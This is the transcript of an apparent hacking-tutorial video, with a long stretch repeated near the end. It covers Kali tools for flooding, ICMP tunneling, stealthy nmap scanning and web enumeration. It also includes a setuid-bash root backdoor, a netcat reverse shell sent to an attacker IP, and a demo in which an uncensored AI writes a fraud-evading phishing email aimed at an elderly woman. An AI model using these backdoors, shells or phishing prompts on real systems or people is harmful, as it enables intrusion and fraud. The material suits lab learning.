Essential Hacking Commands Overview

Here are the top 60 hacking commands you need to know. I also brought in a few experts, so get your coffee ready. If you want to try these commands right now, I've got a free Kali Linux sandbox and a description. Just click that link and right here in your browser, boom, hacking environment. Make sure you read the instructions. You've got two hosts to hack with. Also, all the commands in this video are in the description below. We even created this beautiful top hacking commands cheat sheet. You gotta have this, the humble ping command. We ping a host to see if it's up, and if it's up, we'll hack it. But right now we're sending a 64 byte packet. what do you say we send something bigger to test firewall capabilities? We can type in ping dash S and specify the size of our packet, testing the capabilities of a firewall, or we can get even crazier. We'll still send our large packet ping dash S 1300, but then we'll use a switch dash F to absolutely obliterate this host flood, a ton of packets. And actually, before we do that, I want to see this happen. I'll start another terminal and give you a bonus command here. This tool is called IFTOP. I'll install it with APT install IFTOP. and then type in I have topped a run. Now, let's flood. Oh, look at that. Whew, that's a lot of data. Control C to stop that. Same for IFTOP, goodbye. And actually, let's keep IFTOP up because we're not done with ping yet. I know you didn't realize there's so much to ping. And this tool is kind of crazy. It's called HPING3. We'll install it with apt install HPING3. And we can do fun things like flooding packets on a specific port. For example, port 80. HPING3-S for a TCP packet. Dash V for verbose mode. Gives us more info. Dash dash flood to make it rain. finally the host here we go man look at that and we're hitting port 80 great for testing web servers we can also use HP 3 for a fancy trace route HP 3 dash dash trace route dash V and then here's what's cool we'll do dash 1 for ICMP packets and then our host network Chuck coffee but Sometimes firewalls block ICMP with traceroute. Removing dash 1, we can instead do dash p, 80, and dash s. Doing traceroute on port 80, which is web traffic, HTTP, using of course TCP. And pick your port, maybe 443, maybe 53, use the DNS port, specifying dash dash UDP traffic. Or with TCP traffic we can add the dash A switch, setting the ACK flag, ACK. And then change our base port, with dash dash base port. 1-337, all amazing options to help us evade firewall rules. Now I bet you thought we were done with ping, but we're not. You can tunnel TCP packets over ICMP echo reply and request packets. What? Check this out. It happens with a tool called p-tunnel. APT install p-tunnel. On the target side, we'll simply run p-tunnel. On the attacker side, we'll run ptunnel-p for proxy address, it'll be our target. dashlp to specify our local port, we'll do 8000. dashda for our destination address, it'll also be our target. And we'll do dashdp for our destination port, and because I'm going to try SSH, I'll do port 22. Ready, set, tunnel. Now to watch this happen in real time, I'm going to show you a new command. tcpdump will help us to capture and visualize these packets in real time. We'll use apt install tcpdump to install it. And then we'll run tcpdump dash i for interface and we'll say any and we're only looking for icmp traffic So we'll type in icmp Now watch this. I'll launch a new terminal and i'm going to go over this tunnel using icmp packets. Oh my gosh. Check this out ssh and I'll do username network chuck, that's my username at the other host, at local host, pointing it right here on this computer, this server. Ready, set, go. Do you see it happening? Oh my stinkin'gosh. Literally sending SSA traffic over ICMP echo reply echo request. That's magic. Who am I? IP address. Yep. I'm somewhere else. That's so cool. And control C to close those tunnels on both sides. This is great for evading firewalls that might block that type of traffic. Here's a quick command from Tom Nom Nom. Nom, nom, nom, nom. I'm Tom Nom Nom. And this is a trick I use all the time. If you're running a command and you don't know what you want to do with the output yet, pipe it to vim dash. That'll open the output of the command in vim, and then you can either manually edit it or you can. you can use colon, percent, bang to run it back through any command you want. Run it through sort to put things in order, or grep dash v to remove lines you don't want. And then as a bonus, if you have a file name under your cursor, hit g then f to open that file in a new buffer. InMap will scan a network helping us to discover hosts that we can hack. Here's some fun ways to use it. First, make sure you install it. Apt install InMap. We can scan an entire network for quick mapping with InMap dash sn and then our target network. Hey, it found 11 hosts. The switch lowercase s capital v will we'll do service discovery on a target works like a charm. Use the capital O switch for OS detection. We'll hold up. We tried, but it's blocking ping probes. Let's try dash PN to not do the probe. We'll add that to our command dash capital P lowercase N bam. We got it. It's a windows PC. We can use a lowercase S capital L switch to do quick host name scanning on a network and map scripts, unlock a whole new world. We can scan for, Vulnerabilities on a host with dash dash script, vuln, and then our target host or network. We can use the malware script to scan for known malware. With the capital A switch, we can scan for pretty much everything. Take a little coffee break. It'll take a while. This one switch does OS detection, version detection, some default script scanning from Nmap, and the traceroute. That's a lot of info. That's awesome. If we use the lowercase fswitch, it'll fragment our packets and make it harder for us to be detected while we're scanning. We can also avoid detection by changing our source port using these source ports, which we can just say, Hey, um, I'm DNS don't mind me. And if you really want to be tricky with in map, you can scan with decoys, check this out and that dash capital D for decoys and then specify R and D all cap. colon let's say 10 what that will do is generate 10 random IP addresses random decoys that you're scanning from so they can't find you we'll put our host in and then bam scanning from 10 different IP addresses now in map is cool but what if you have a lot to scan like networks upon networks and you want to scan them fast that's where mass scan comes in once dull mass scan with apt install mass scan mass scan is similar to in map now we can specify ports to scan for specify a network but then we can specify our rate and go super fast. just like that. Or if we have no idea what networks we're dealing with, we can scan everything by the entire 10 dot subnet range. And we'll do a rate of 10,000. Now it is fast, but you still might want to take a coffee break. Just saying, we'll just control C that we could also use the randomized host switch to change the order in which we scan our host or networks, helping us stay a bit more hidden, or we can quickly find servers foolishly running telnet on a network super insecure, but we can find that out right now simply by specifying port 23 and scanning an entire network back. Got one. Now here's John Handman with something a bit silly, but I love it though. You normally just enter LS on the command line to list stuff in the current directory. Well, did you know that there is actually an SL command? Like if you were typing really fast or you accidentally made a mistake, or you had a typo when you meant to type LS and you accidentally typed SL, this is the Steam locomotive. And it is a train that is displayed on your computer screen on the command line on the terminal. And look, you can't get out of this. You can't type anything. You can't do anything. You just have to wait for the whole train to drive by. Now, the next fun hacking command that I want to show you is actually part of the dev piece of the file system. I don't know if you're familiar, but there is a slash dev slash you random file. And that is like a device to list out. pseudo-random data just coming from your computer, right? Hey, you have a stream, a constant stream of randomness. And this looks hysterical. It is just gibberish, nonsense, zeros and ones, and all the data up to 255 ASCII characters, printable, non-printable, and it just looks like absolute chaos. You can control C out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell. So it's something that you might be able to do as a troll, as a meme, right? So what if we actually set an alias for that same LS command? Maybe we could set that to SL if we wanted to run the Steam locomotive train again, but we could set that to cat dev U random. And now anytime someone were to actually enter LS on the command line, thinking that they're going to list files, it'll just spit up and go crazy with all that random gibberish and nonsense. I think that's kind of fun. By the way, John Hammond will show us a real hacking command he loves later in the video. The whois command will tell you a ton of stuff about a domain. Install it with apt install whois. Whoismicrosoft.com. Fax number, phone number, address. Let's try cia.gov. Redacted. Should have expected that. WhatWeb will tell you what technologies a website is using. apt install whatweb to install it. And then we'll type in whatweb. and our domain we'll try network chuck.coffee and while it's scanning perfect time for a coffee break it gives you a ton of information including the fact that it's powered by shopify right there next up curl from nahumsec my favorite command is actually not using any hacking tools and it's probably one of the most basic commands used on linux and it comes by default on almost any offer system. And that is a curl command. And let me show you real quickly how I use it. The first thing I want to do is usually I just want to do a curl dash I that usually gives you the headers and every response in that header of what it is coming back from the server. So in this case, it's giving us a 302. And it's saying hey, you are going to get redirected to this exact location. And I like doing curl a lot because I'm having a lot of API's most of the time and with API's I want to just quickly see if an endpoint is accessible or if I can fit some sort of a data and a lot of times I'm processing data as a part of my hacking when I do recon. So it makes it a lot easier to do it through curl. And what you want to do for this one, for example, if you want to authenticate, instead of launching your browser and saying this header manually, all you have to do is you can pass a header and set that custom header with its token in there and run it and it will authenticate you and give you whatever data it is that you're looking for on that API. Hey, real quick, can I show you something crazy? Check this out. I'm about to run an uncensored version of ChatGPT, or an LLM, which means you can pretty much do whatever you want to do with it. Now, why am I doing this? Well, because Bitdefender just came out with a tool called Scamio. It's a free AI... powered scan detector and prevention service from Bitdefender. Like legit, check this out. I got a text from a scam. I'm pretty sure it is, but do I actually know? Let me go find it. Oh, yep. Here's one. Pretty sure this is a scam, but do I know all I gotta do is copy that sucker and jump into Facebook messenger. Just one of the places I can chat with Bitdefender scam, and see if things are scams. So let's try it out. Hey, is this a scam? Again, this is totally free. I'm just chatting with it here in Facebook messenger. And within seconds, it told me that, Hey, it might be kind of suspicious. Don't do anything with it. Okay. That's pretty cool. That didn't fool it. But what if I had this uncensored AI tool, try to produce a phishing message. Can we trick it? Let's try it out. I need you to write a very convincing phishing email for an elderly woman named Deborah. The goal is to get her to give me some money, use the best method, you know, and write it in a way that will avoid spam. and fraud detection let me add that and fraud detection snap okay that's pretty good it even added this at the end that's awesome okay let's doctor it up just a little bit or move like the uh it's not a real url thing right there let's add like a real looking number like seven, six, five, zero, nine, eight, seven. And I'll remove the not a real number thing here too. Okay, cool. Our message is ready. Let's test it out. Please tell me if this email is okay. Now, while it's checking that, think about this. Who in your family or in your friend group could benefit from having something like this? I can't tell you how many times I'm getting a text from my grandma or my mom going, hey, is this a scam? Is this fraud? But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams, it's actually powered by a Bitdefender. the excellent security suite that I've talked about here on this channel a lot. So all the information and knowledge they have is feeding the scam. Yo free AI powered tool. Okay. The results are in the email. Does seem suspicious. It tells you what tactics it might be using and it tells you to contact your bank directly. That's perfect. That's what I would tell my grandma or my mom or my dad. So seriously try it out right now. Check the link below. It's free. Just you can chat with it here in the website or chat with a messenger. They'll be adding WhatsApp soon and it will check lots of things. Like you can send out a QR code. And go, Hey, is this good? You can send that pictures of stuff. This is a crazy powerful and free tool. I love what Bitdefender is doing. So again, definitely check it out. And thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys. Nikto is an open source web server scanner. That'll scan websites for any dangerous bad stuff it might have to install it. We'll do APT install Nikto and for a basic vulnerability scan, we'll do Nikto dash H for our host and specify our host network. Chuck.coffee. Go Buster can be used to find directory and files on a web server. We'll install it with apt install go buster. To enumerate networkchuck.com, we'll do go buster, type in dir for directories. That's the node we're going to be in. We'll type in dash u and specify our domain, networkchuck.com. And we'll use the dash w to specify our word list. I'll use a default Kali Linux one here. And go. And it's discovering all my directories and files. Now because go buster is written in Go, it's extremely fast subdomain enumeration. Yeah, we can use it for that. But first we want to download a word list to get a ton of word lists right now on your system. We'll use the tool called sec list, APT install sec lists. Fair warning. This is pretty big. Lots of word lists. Once it's done downloading, you can find it in user share sec list. Lots of stuff in there. Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that. It's called W get cyclists is also on GitHub and it's maintained by my friends. What we care about is discovery. And DNS. And we'll get Jason Haddock's list here. I'm going to grab the raw URL. To install WGIT, APT, install WGIT. Kind of seeing a pattern here, right? Type in WGIT, paste that URL, WGIT. Now getting back to GoBuster, we can enumerate domains. We'll type in GoBuster, and it'll be DNS. We'll specify our domain with dash D, networkchuck.com, and then our word list with dash W. I'll use Jason Haddock's DNS. Ready, set, go. Now that's a pretty big list. And if I were doing a legit pen test, I probably let this finish out, but I don't have time for that. I'm not patient enough. Control C to stop that. I want to show you another way to do subdomain enumeration. This tool is called sub lister. You can install it with APT install sub lister just like this. And the E is a three and then to run sub lister, we'll simply type in sub lister dash D to specify our domain network, chuck.com and let it go. And it found a lot of stuff. This next one is pretty fun. It's called WP scan. It will scan WordPress sites and help you find all the issues that might be affecting it. Great if you're a WordPress site owner and great if you're a pen tester, let's try it out. We can run it in a few ways. First way, WP scan. We'll do dash dash URL and specify our URL. We'll do chuckkeith.com. My personal website that's not doing anything. And then we'll do dash dash enumerates U. Not U, the letter U. The U stands for users. Let's try it out. That's a lot of information. We can also use the P option for plug-ins. We can use T for themes. or do something pretty aggressive. We'll do VP, VT, dash dash plugins, dash detection, and we'll add aggressive at the end, just to make sure we get our point across. This is a super aggressive vulnerability scan. Let's try it out. you may have noticed that all of those commands did not output anything fun because you need an API token from WP scan, which you can get for free right now. And then you would run the commands like this, specifying your API token with the dash dash API dash token switch. A mass is another tool you can use for subdomain enumeration, install it with APT install and to run it. We'll type in a mass, type in enum dash D to specify our domain network chuck.com and let it go. This tool might run forever. I don't want to wait for it though. Control C to stop that. But man, look at all the stuff about to do a more passive enumeration. You can do this, a mass and numb and we'll specify dash passive and then our domain. Whereas the other one was a bit more active. I like a mass because it does this options based on what our scope is. And we'll go ahead and stop that. This next command opens up the door to new commands. What does that mean? You'll see it's a tool called get, which will often use when you first start out to interact with GitHub. Let me show you, there's a tool we're about to use called search ploy. But the way we use this tool is by downloading it from GitHub. And actually I lied. This is a GitLab repository, but it's pretty much the same thing. You'll use Git all the time to install all kinds of stuff. But first we have to install Git. apt install git. You probably already have it. And then probably my favorite command is git clone. We're going to clone a tool onto our computer. And in our case, it will be search void. Let's go. To properly use that command, we'll add a symbolic link. We're not gonna talk about that, just know it's a command below. And then finally we can use the command searchsploit, right? Yeah, it's gonna work. Let's try searching for WordPress plugins. It'll search for exploits that involve WordPress plugins. What about SSH? A ton of exploits pertaining to SSH. Super handy tool. If you want to update the database, searchsploit-u. Crazy powerful tool. Now here's John Hammond with a real hacking command. It's kind of awesome. Let me get into the real, genuine, ethical hacking and penetration testing, my favorite top hacking command. Here's the thing. When you're on the command line interacting with the shell, you're actually running this program called Bash, or the born-again shell. Now, that lives on the file system in slash bin bash. So if I were to actually execute this, it doesn't look like it does anything. I just get the prompt back because I've just invoked and I'm running a shell or terminal inside my shell. So I could exit out of that and get back to my original prompt. But bin bash actually takes a special argument called TACP. And that will enforce and maintain set UID permissions, which means that the owner of the file root in this case, the admin absolute controller of the computer will be able to keep their permissions, but it has to be a set UID binary. So the way that we could do that. is actually change mod or ch modifications change modifications on the file and add or plus the s letter for set uid we'll put that on bin bash and this will require some root privileges that means that you need to be the admin to be able to configure this but what that ultimately does is create a back door where you have a persistence mechanism a little bit of a foothold so that at any point If we configure this with our pseudo password later on down the line, you get access to this machine one more time. Now you can just run bash tag P and you are root. You control the whole machine because you are the admin user. You set up that back door. If you wanted to, you could move into the root directory and you could do anything that you want. Maybe we could echo hello into a please subscribe. to network chuck i'll hit enter on that and now if i zoom out let me show you this lstackla we can see our file right there please subscribe to network chuck hey just owned and controlled by the root user and we were able to configure that with our backdoor sudo chmod plus s bin bash that is my favorite top hacking command because then you've got a backdoor. You've got a persistence mechanism and a way to become root at any point. I hope you enjoyed a couple of those really neat, hey, top hacking commands, but thank you so much Network Chuck for letting me join the party here. This was an absolute blast. Now I'm going to do something bad. I want to do the same command twice. What? No, I know it's okay. We're going to talk about TCP dump again. Why? Well, because there's more cool stuff about it and we didn't give it enough time. We'll type in TCP dump. We'll type in dash w to send it to a file. We'll just call it capture dot pcap then dash I for our interface and we'll do ethernet zero. That's the one I have now. Let me just make sure that's the case. IP address. Yes. Ethernet zero and go. Now we'll generate some traffic. Do something fun that we've already learned and map with random addresses. Decoys. We'll stop that with control C. We can analyze that traffic with this command. tcpdump-r. Specify our capture file, we'll just capture.pcap. Let's take a look. Cool, we can see it. We can also limit the amount of packets we capture. tcpdump and the switch dash C for count and we'll say like 100. That did not take long. Now tcpdump is pretty cool. Great for quick captures but the real tool you want to use that's crazy powerful is Tshark, the command line brother of Wireshark. To install Tshark, we'll do apt install Tshark. Tshark can do a lot. Let's try a few things. First, we'll type in Tshark and we'll capture one packet. Just one. We'll put it in verbose mode with dash capital V. We'll do dash C for count. We'll do one and then dash I, ethernet zero. One packet captured. And then look at all the stuff it shows us. That is so powerful. Networking geeks are just drooling. So yes, I'm drooling. Do you want to see something crazier? Filters. Watch this. Tshark. We'll do a dash Y to apply a display filter. With a single quote, we'll specify it. We'll do http.request.method space equals equals and a double quote to get. And then close it out with a single quote. I know it's kind of wordy, but check this out. Let's specify our interface. Get that zero. And we're now capturing and only showing get request. How cool is that? Let's generate some curlacademy.networkchuck.com. There's another one. That's so cool. Now one of the most powerful ways we can use Tshark is by analyzing packet captures. So let's do a capture real quick to a file, Tshark, and actually no, I'm gonna show you one cool thing. We'll use a command called timeout and put in 15 seconds and it will timeout or stop this packet capture in 15 seconds. It's pretty cool. Tshark dash i ethernet 0 and with the dash w command similar to tcpdump we'll send that to a file. Tshark dash pgap. Let me try to generate some quick traffic. And done. To display statistics and specifically to follow endpoint connections, use this command, tshark-r. We'll specify our capture, which was tshark.pcap. Then we'll use the switches dash qz and specify endpoints comma ip. How cool is that? We can also follow a TCP stream with tshark-r, our capture, dash qz, and we'll say follow comma. TCP, and we'll put that in ASCII. So ASCII, we'll do comma, we'll follow the seventh stream. That's pretty cool. Let's try, I don't know, the first stream. First stream's crazy. Let's do the 20th stream. 100th stream. So powerful. We could also simply do custom output of fields based on the capture we're reviewing. Check this out. Tsharp, do a dash E, IP dot source. Dash E, IP dot dest, or DST. Dash E, frame dot protocols. Notice we're specifying fields. We'll do a dash T, fields. Which is telling it to only output the fields we're specifying. And then finally"-r", specifying our capture. How cool is that? So powerful. This is my new favorite tool, TMUX. A terminal multiplexer. Install TMUX with apt install tmux. And then simply type in tmux. We suddenly have a new terminal that we can do stuff in, like pingingacademy.networkchuck.com. Leave that there, hit Ctrl B, and then D on your keyboard. You're detached from it, and then with TMUX A, get right back to it. How powerful is that? I'll stop this, type in exit to close that out. We can create multiple sessions and name them. So tmux new dash S and name it Bob. Here's Bob, we'll ping something here. Detach from that, create another session, Suzy. And now if I type in tmux ls, I've got two sessions and I can reattach to either of them. tmux a dash T to specify my target will say Suzy. Jumping right back in there. I can hit Control-B and then W to quickly jump between my various TMUX sessions. And I can leave, go to another computer, jump back in here, and connect to any one of these sessions. If you wanna learn more, I did a whole video on TMUX right up here. SSH, we use it all the time to remote into our systems. So for example, this Ubuntu guy. To jump into him, I'll use SSH. SSH, network Chuck at his IP address. Already cool, but it can do more. Instead of logging in, I can actually just run a command via SSH on another system. with SSH, network chuck at my server, and then right after that, specify the command I want to run. So in single quotes, I can say, who am I? Bam. Or IP address. Crazy powerful. Let's get crazier. You can actually make it a SOCKS proxy. What? Watch this. Before I create the tunnel, let me demonstrate my location right now. What's my IP address? I'm in Dallas, Texas as you can see right here. But if I use this crazy SSH command, I'll create a proxy and tunnel myself somewhere else. SSH-D, which is telling it to create a SOCKS proxy and I'll say port 1337. We'll do a"-C for compression,"-Q for quiet mode, and"-N to not execute any commands. And finally our server information. Root, at, and this will be a server in Japan. Put our password in. Now we're gonna launch Chromium using that proxy. Our SOCKS5, the local host. Ready, set, go. Chromium's launched. Now let's see where we are. Already feel a bit different. And given that I'm having a hard time figuring out where to go, I'm definitely in Osaka, Japan. Super cool, right? Netcat, our go-to for reverse shows. To install Netcat, we'll do apt install netcat-traditional. To verify, just type in nc-h. With Netcat installed on both your attacking computer and your target computer, let's do a reverse shell. On the attacker, all we gotta do is wait. Wait for the shell. Type in NC-LVP in the port you're waiting on. 1337. We're waiting. Because on a reverse shell, the target reaches out to us. On the target side, I will type in NC for Netcat. We'll do a dash E and specify the shell we wanna have access to. So we'll do forward slash bin, forward slash sh, specify our attacker IP, which is us, and the port, 1337, that the attacker is listening on. And then we'll hit enter, and something happened? It sure stinking did, check it out. I'm on the other computer. I've got a reverse shell. Now you can also do a fun thing where you just set up a simple chat server with Netcap. Why? I don't know, but you can do it. You should try it. It's fun. On one side you type in nc-lvp, set a port. On the other side, type in nc-v, the IP address of the other computer, and the port. So now I can say, hey, and I get hey on the other side. What are you thinking about? The end of this video. Me too. I'll catch you guys next time. For real though. Bye.

You've got two hosts to hack with. Also, all the commands in this video are in the description below. We even created this beautiful top hacking commands cheat sheet.

You gotta have this, the humble ping command. We ping a host to see if it's up, and if it's up, we'll hack it. But right now we're sending a 64 byte packet. what do you say we send something bigger to test firewall capabilities?

We can type in ping dash S and specify the size of our packet, testing the capabilities of a firewall, or we can get even crazier. We'll still send our large packet ping dash S 1300, but then we'll use a switch dash F to absolutely obliterate this host flood, a ton of packets. And actually, before we do that, I want to see this happen.

I'll start another terminal and give you a bonus command here. This tool is called IFTOP. I'll install it with APT install IFTOP. and then type in I have topped a run. Now, let's flood.

Oh, look at that. Whew, that's a lot of data. Control C to stop that. Same for IFTOP, goodbye.

And actually, let's keep IFTOP up because we're not done with ping yet. I know you didn't realize there's so much to ping. And this tool is kind of crazy. It's called HPING3. We'll install it with apt install HPING3.

And we can do fun things like flooding packets on a specific port. For example, port 80. HPING3-S for a TCP packet. Dash V for verbose mode. Gives us more info. Dash dash flood to make it rain.

finally the host here we go man look at that and we're hitting port 80 great for testing web servers we can also use HP 3 for a fancy trace route HP 3 dash dash trace route dash V and then here's what's cool we'll do dash 1 for ICMP packets and then our host network Chuck coffee but Sometimes firewalls block ICMP with traceroute. Removing dash 1, we can instead do dash p, 80, and dash s. Doing traceroute on port 80, which is web traffic, HTTP, using of course TCP. And pick your port, maybe 443, maybe 53, use the DNS port, specifying dash dash UDP traffic. Or with TCP traffic we can add the dash A switch, setting the ACK flag, ACK.

And then change our base port, with dash dash base port. 1-337, all amazing options to help us evade firewall rules. Now I bet you thought we were done with ping, but we're not.

You can tunnel TCP packets over ICMP echo reply and request packets. What? Check this out.

It happens with a tool called p-tunnel. APT install p-tunnel. On the target side, we'll simply run p-tunnel. On the attacker side, we'll run ptunnel-p for proxy address, it'll be our target. dashlp to specify our local port, we'll do 8000. dashda for our destination address, it'll also be our target.

And we'll do dashdp for our destination port, and because I'm going to try SSH, I'll do port 22. Ready, set, tunnel. Now to watch this happen in real time, I'm going to show you a new command. tcpdump will help us to capture and visualize these packets in real time. We'll use apt install tcpdump to install it. And then we'll run tcpdump dash i for interface and we'll say any and we're only looking for icmp traffic So we'll type in icmp Now watch this.

I'll launch a new terminal and i'm going to go over this tunnel using icmp packets. Oh my gosh. Check this out ssh and I'll do username network chuck, that's my username at the other host, at local host, pointing it right here on this computer, this server. Ready, set, go. Do you see it happening?

Oh my stinkin'gosh. Literally sending SSA traffic over ICMP echo reply echo request. That's magic.

Who am I? IP address. Yep. I'm somewhere else. That's so cool.

And control C to close those tunnels on both sides. This is great for evading firewalls that might block that type of traffic. Here's a quick command from Tom Nom Nom.

Nom, nom, nom, nom. I'm Tom Nom Nom. And this is a trick I use all the time.

If you're running a command and you don't know what you want to do with the output yet, pipe it to vim dash. That'll open the output of the command in vim, and then you can either manually edit it or you can. you can use colon, percent, bang to run it back through any command you want. Run it through sort to put things in order, or grep dash v to remove lines you don't want. And then as a bonus, if you have a file name under your cursor, hit g then f to open that file in a new buffer.

InMap will scan a network helping us to discover hosts that we can hack. Here's some fun ways to use it. First, make sure you install it. Apt install InMap. We can scan an entire network for quick mapping with InMap dash sn and then our target network.

Hey, it found 11 hosts. The switch lowercase s capital v will we'll do service discovery on a target works like a charm. Use the capital O switch for OS detection.

We'll hold up. We tried, but it's blocking ping probes. Let's try dash PN to not do the probe. We'll add that to our command dash capital P lowercase N bam. We got it.

It's a windows PC. We can use a lowercase S capital L switch to do quick host name scanning on a network and map scripts, unlock a whole new world. We can scan for, Vulnerabilities on a host with dash dash script, vuln, and then our target host or network. We can use the malware script to scan for known malware. With the capital A switch, we can scan for pretty much everything.

Take a little coffee break. It'll take a while. This one switch does OS detection, version detection, some default script scanning from Nmap, and the traceroute. That's a lot of info. That's awesome.

If we use the lowercase fswitch, it'll fragment our packets and make it harder for us to be detected while we're scanning. We can also avoid detection by changing our source port using these source ports, which we can just say, Hey, um, I'm DNS don't mind me. And if you really want to be tricky with in map, you can scan with decoys, check this out and that dash capital D for decoys and then specify R and D all cap.

colon let's say 10 what that will do is generate 10 random IP addresses random decoys that you're scanning from so they can't find you we'll put our host in and then bam scanning from 10 different IP addresses now in map is cool but what if you have a lot to scan like networks upon networks and you want to scan them fast that's where mass scan comes in once dull mass scan with apt install mass scan mass scan is similar to in map now we can specify ports to scan for specify a network but then we can specify our rate and go super fast. just like that. Or if we have no idea what networks we're dealing with, we can scan everything by the entire 10 dot subnet range. And we'll do a rate of 10,000. Now it is fast, but you still might want to take a coffee break.

Just saying, we'll just control C that we could also use the randomized host switch to change the order in which we scan our host or networks, helping us stay a bit more hidden, or we can quickly find servers foolishly running telnet on a network super insecure, but we can find that out right now simply by specifying port 23 and scanning an entire network back. Got one. Now here's John Handman with something a bit silly, but I love it though. You normally just enter LS on the command line to list stuff in the current directory.

Well, did you know that there is actually an SL command? Like if you were typing really fast or you accidentally made a mistake, or you had a typo when you meant to type LS and you accidentally typed SL, this is the Steam locomotive. And it is a train that is displayed on your computer screen on the command line on the terminal. And look, you can't get out of this.

You can't type anything. You can't do anything. You just have to wait for the whole train to drive by.

Now, the next fun hacking command that I want to show you is actually part of the dev piece of the file system. I don't know if you're familiar, but there is a slash dev slash you random file. And that is like a device to list out. pseudo-random data just coming from your computer, right?

Hey, you have a stream, a constant stream of randomness. And this looks hysterical. It is just gibberish, nonsense, zeros and ones, and all the data up to 255 ASCII characters, printable, non-printable, and it just looks like absolute chaos.

You can control C out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell. So it's something that you might be able to do as a troll, as a meme, right? So what if we actually set an alias for that same LS command? Maybe we could set that to SL if we wanted to run the Steam locomotive train again, but we could set that to cat dev U random. And now anytime someone were to actually enter LS on the command line, thinking that they're going to list files, it'll just spit up and go crazy with all that random gibberish and nonsense.

I think that's kind of fun. By the way, John Hammond will show us a real hacking command he loves later in the video. The whois command will tell you a ton of stuff about a domain. Install it with apt install whois.

Whoismicrosoft.com. Fax number, phone number, address. Let's try cia.gov. Redacted.

Should have expected that. WhatWeb will tell you what technologies a website is using. apt install whatweb to install it. And then we'll type in whatweb. and our domain we'll try network chuck.coffee and while it's scanning perfect time for a coffee break it gives you a ton of information including the fact that it's powered by shopify right there next up curl from nahumsec my favorite command is actually not using any hacking tools and it's probably one of the most basic commands used on linux and it comes by default on almost any offer system.

And that is a curl command. And let me show you real quickly how I use it. The first thing I want to do is usually I just want to do a curl dash I that usually gives you the headers and every response in that header of what it is coming back from the server. So in this case, it's giving us a 302. And it's saying hey, you are going to get redirected to this exact location.

And I like doing curl a lot because I'm having a lot of API's most of the time and with API's I want to just quickly see if an endpoint is accessible or if I can fit some sort of a data and a lot of times I'm processing data as a part of my hacking when I do recon. So it makes it a lot easier to do it through curl. And what you want to do for this one, for example, if you want to authenticate, instead of launching your browser and saying this header manually, all you have to do is you can pass a header and set that custom header with its token in there and run it and it will authenticate you and give you whatever data it is that you're looking for on that API.

Hey, real quick, can I show you something crazy? Check this out. I'm about to run an uncensored version of ChatGPT, or an LLM, which means you can pretty much do whatever you want to do with it.

Now, why am I doing this? Well, because Bitdefender just came out with a tool called Scamio. It's a free AI...

powered scan detector and prevention service from Bitdefender. Like legit, check this out. I got a text from a scam.

I'm pretty sure it is, but do I actually know? Let me go find it. Oh, yep.

Here's one. Pretty sure this is a scam, but do I know all I gotta do is copy that sucker and jump into Facebook messenger. Just one of the places I can chat with Bitdefender scam, and see if things are scams.

So let's try it out. Hey, is this a scam? Again, this is totally free. I'm just chatting with it here in Facebook messenger. And within seconds, it told me that, Hey, it might be kind of suspicious.

Don't do anything with it. Okay. That's pretty cool.

That didn't fool it. But what if I had this uncensored AI tool, try to produce a phishing message. Can we trick it?

Let's try it out. I need you to write a very convincing phishing email for an elderly woman named Deborah. The goal is to get her to give me some money, use the best method, you know, and write it in a way that will avoid spam.

and fraud detection let me add that and fraud detection snap okay that's pretty good it even added this at the end that's awesome okay let's doctor it up just a little bit or move like the uh it's not a real url thing right there let's add like a real looking number like seven, six, five, zero, nine, eight, seven. And I'll remove the not a real number thing here too. Okay, cool. Our message is ready. Let's test it out.

Please tell me if this email is okay. Now, while it's checking that, think about this. Who in your family or in your friend group could benefit from having something like this?

I can't tell you how many times I'm getting a text from my grandma or my mom going, hey, is this a scam? Is this fraud? But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams, it's actually powered by a Bitdefender.

the excellent security suite that I've talked about here on this channel a lot. So all the information and knowledge they have is feeding the scam. Yo free AI powered tool. Okay.

The results are in the email. Does seem suspicious. It tells you what tactics it might be using and it tells you to contact your bank directly.

That's perfect. That's what I would tell my grandma or my mom or my dad. So seriously try it out right now.

Check the link below. It's free. Just you can chat with it here in the website or chat with a messenger.

They'll be adding WhatsApp soon and it will check lots of things. Like you can send out a QR code. And go, Hey, is this good? You can send that pictures of stuff. This is a crazy powerful and free tool.

I love what Bitdefender is doing. So again, definitely check it out. And thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys.

Nikto is an open source web server scanner. That'll scan websites for any dangerous bad stuff it might have to install it. We'll do APT install Nikto and for a basic vulnerability scan, we'll do Nikto dash H for our host and specify our host network. Chuck.coffee.

Go Buster can be used to find directory and files on a web server. We'll install it with apt install go buster. To enumerate networkchuck.com, we'll do go buster, type in dir for directories.

That's the node we're going to be in. We'll type in dash u and specify our domain, networkchuck.com. And we'll use the dash w to specify our word list.

I'll use a default Kali Linux one here. And go. And it's discovering all my directories and files.

Now because go buster is written in Go, it's extremely fast subdomain enumeration. Yeah, we can use it for that. But first we want to download a word list to get a ton of word lists right now on your system. We'll use the tool called sec list, APT install sec lists. Fair warning.

This is pretty big. Lots of word lists. Once it's done downloading, you can find it in user share sec list.

Lots of stuff in there. Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that. It's called W get cyclists is also on GitHub and it's maintained by my friends. What we care about is discovery. And DNS.

And we'll get Jason Haddock's list here. I'm going to grab the raw URL. To install WGIT, APT, install WGIT.

Kind of seeing a pattern here, right? Type in WGIT, paste that URL, WGIT. Now getting back to GoBuster, we can enumerate domains.

We'll type in GoBuster, and it'll be DNS. We'll specify our domain with dash D, networkchuck.com, and then our word list with dash W. I'll use Jason Haddock's DNS. Ready, set, go.

Now that's a pretty big list. And if I were doing a legit pen test, I probably let this finish out, but I don't have time for that. I'm not patient enough.

Control C to stop that. I want to show you another way to do subdomain enumeration. This tool is called sub lister.

You can install it with APT install sub lister just like this. And the E is a three and then to run sub lister, we'll simply type in sub lister dash D to specify our domain network, chuck.com and let it go. And it found a lot of stuff.

This next one is pretty fun. It's called WP scan. It will scan WordPress sites and help you find all the issues that might be affecting it. Great if you're a WordPress site owner and great if you're a pen tester, let's try it out.

We can run it in a few ways. First way, WP scan. We'll do dash dash URL and specify our URL.

We'll do chuckkeith.com. My personal website that's not doing anything. And then we'll do dash dash enumerates U.

Not U, the letter U. The U stands for users. Let's try it out.

That's a lot of information. We can also use the P option for plug-ins. We can use T for themes.

